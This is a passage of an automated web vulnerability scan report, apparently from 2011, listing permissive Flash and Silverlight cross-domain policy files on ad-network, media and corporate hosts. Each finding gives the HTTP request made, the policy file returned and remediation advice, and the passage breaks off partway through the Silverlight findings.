Date: Sun, 15 May 2011 15:40:39 GMT
Server: Apache
Last-Modified: Mon, 13 Sep 2010 13:56:24 GMT
ETag: "2d282ae-71-4902476407200"
Accept-Ranges: bytes
Content-Type: text/xml
Cache-Control: private, max-age=600
Age: 0
Expires: Sun, 15 May 2011 15:50:39 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.ligatus.com" />
</cross-domain-policy>

4.25. http://d.ligatus.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://d.ligatus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.ligatus.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"315-1288858532000"
Last-Modified: Thu, 04 Nov 2010 08:15:32 GMT
Content-Type: application/xml
Content-Length: 315
Date: Sun, 15 May 2011 15:40:41 GMT
Connection: close
Server: Apache

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.ligatus.com"/>
<allow-access-from domain="*.net5.nl"/>
<allow-access-from domain="*.sbs6.nl"/>
<allow-access-from domain="*.veronicatv.nl"/>
<allow-access-from domain="*.adverterenbijsbs.nl"/>
...[SNIP]...

4.26. http://edge.sharethis.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://edge.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.sharethis.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 06 May 2011 17:23:38 GMT
ETag: "16b43-14a-4a29ec0155a80"
Content-Type: application/xml
Date: Sun, 15 May 2011 13:59:58 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

4.27. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Server: Apache
Content-Type: text/xml
Cache-Control: max-age=11
Expires: Sun, 15 May 2011 13:56:04 GMT
Date: Sun, 15 May 2011 13:55:53 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.28. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 10:46:01 GMT
Expires: Mon, 16 May 2011 10:46:01 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 9032
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.29. http://hc2.humanclick.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://hc2.humanclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: hc2.humanclick.com

Response

HTTP/1.1 200 OK
Content-Length: 526
Content-Type: text/xml
Content-Location: http://hc2.humanclick.com/crossdomain.xml
Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT
Accept-Ranges: bytes
ETag: "076249f5c35c91:da2"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 13:56:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...

4.30. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=115
Expires: Sun, 15 May 2011 13:57:47 GMT
Date: Sun, 15 May 2011 13:55:52 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.31. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 14 May 2011 16:59:52 GMT
Expires: Sun, 15 May 2011 16:59:52 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 73547
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.32. http://pubads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 03:47:21 GMT
Expires: Mon, 16 May 2011 03:47:21 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 34202
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.33. http://tvgids.upc.nl/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tvgids.upc.nl
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: tvgids.upc.nl

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:40:40 GMT
Server: Apache
Last-Modified: Wed, 28 Jul 2010 15:36:40 GMT
ETag: "47e004-d2-48c74624ab200"
Accept-Ranges: bytes
Content-Length: 210
Cache-Control: max-age=5
Expires: Sun, 15 May 2011 15:40:45 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rtl.nl" />
</cross-domai
...[SNIP]...

4.34. http://w.sharethis.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: w.sharethis.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 06 May 2011 17:23:38 GMT
ETag: "32e87-14a-4a29ec0155a80"
Content-Type: application/xml
Date: Sun, 15 May 2011 13:59:51 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

4.35. http://www.hp.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:14 GMT
Server: Apache
Last-Modified: Mon, 17 May 2010 11:29:38 GMT
ETag: "8a41ec80"
Accept-Ranges: bytes
Content-Length: 213
Cache-Control: max-age=7200
Expires: Sun, 15 May 2011 15:16:14 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.hp.com" />
</cross-dom
...[SNIP]...

4.36. http://www.upc.nl/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.upc.nl
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.upc.nl

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:40:33 GMT
Server: Apache
Last-Modified: Thu, 13 Jan 2011 11:26:11 GMT
ETag: "3e350a-1b1-499b895acbac0"
Accept-Ranges: bytes
Content-Length: 433
Cache-Control: max-age=5
Expires: Sun, 15 May 2011 15:40:38 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="ccc.upc.nl" />
<allow-access-from domain="*.chello.com" />
<allow-access-from domain="*.upc.com" />
<allow-access-from domain="*.upc.pl" />
...[SNIP]...

4.37. http://www.youtube.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Sun, 15 May 2011 14:06:56 GMT
Server: Apache
Last-Modified: Fri, 13 May 2011 03:51:08 GMT
ETag: "132-4a320373f0300"
Accept-Ranges: bytes
Content-Length: 306
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

4.38. http://t.tmimgcdn.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.tmimgcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.tmimgcdn.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.36
Date: Sun, 15 May 2011 13:56:59 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Mon, 07 Jun 2010 12:27:24 GMT
ETag: "3d88165-105-4886fcb83c300"
Accept-Ranges: bytes
Content-Length: 261
Expires: Wed, 09 May 2012 13:56:59 GMT
Cache-Control: max-age=31104000
X-Cache: MISS

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">


<cross-domain-policy>


<allow-access-from domain="images.templatemonster.com" headers="*" secure="true" />
...[SNIP]...

4.39. http://www.templatemonster.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.templatemonster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.templatemonster.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sun, 15 May 2011 13:59:36 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Mon, 07 Jun 2010 12:27:24 GMT
ETag: "3d88165-105-4886fcb83c300"
Accept-Ranges: bytes
Content-Length: 261

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">


<cross-domain-policy>


<allow-access-from domain="images.templatemonster.com" headers="*" secure="true" />
...[SNIP]...

5. Silverlight cross-domain policy  previous  next
There are 7 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Sun, 15 May 2011 13:16:52 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://c.gelifesciences.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.gelifesciences.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: c.gelifesciences.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:18:55 GMT
Server: Omniture DC/2.0.0
xserver: www74
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.3. http://iinet.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://iinet.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

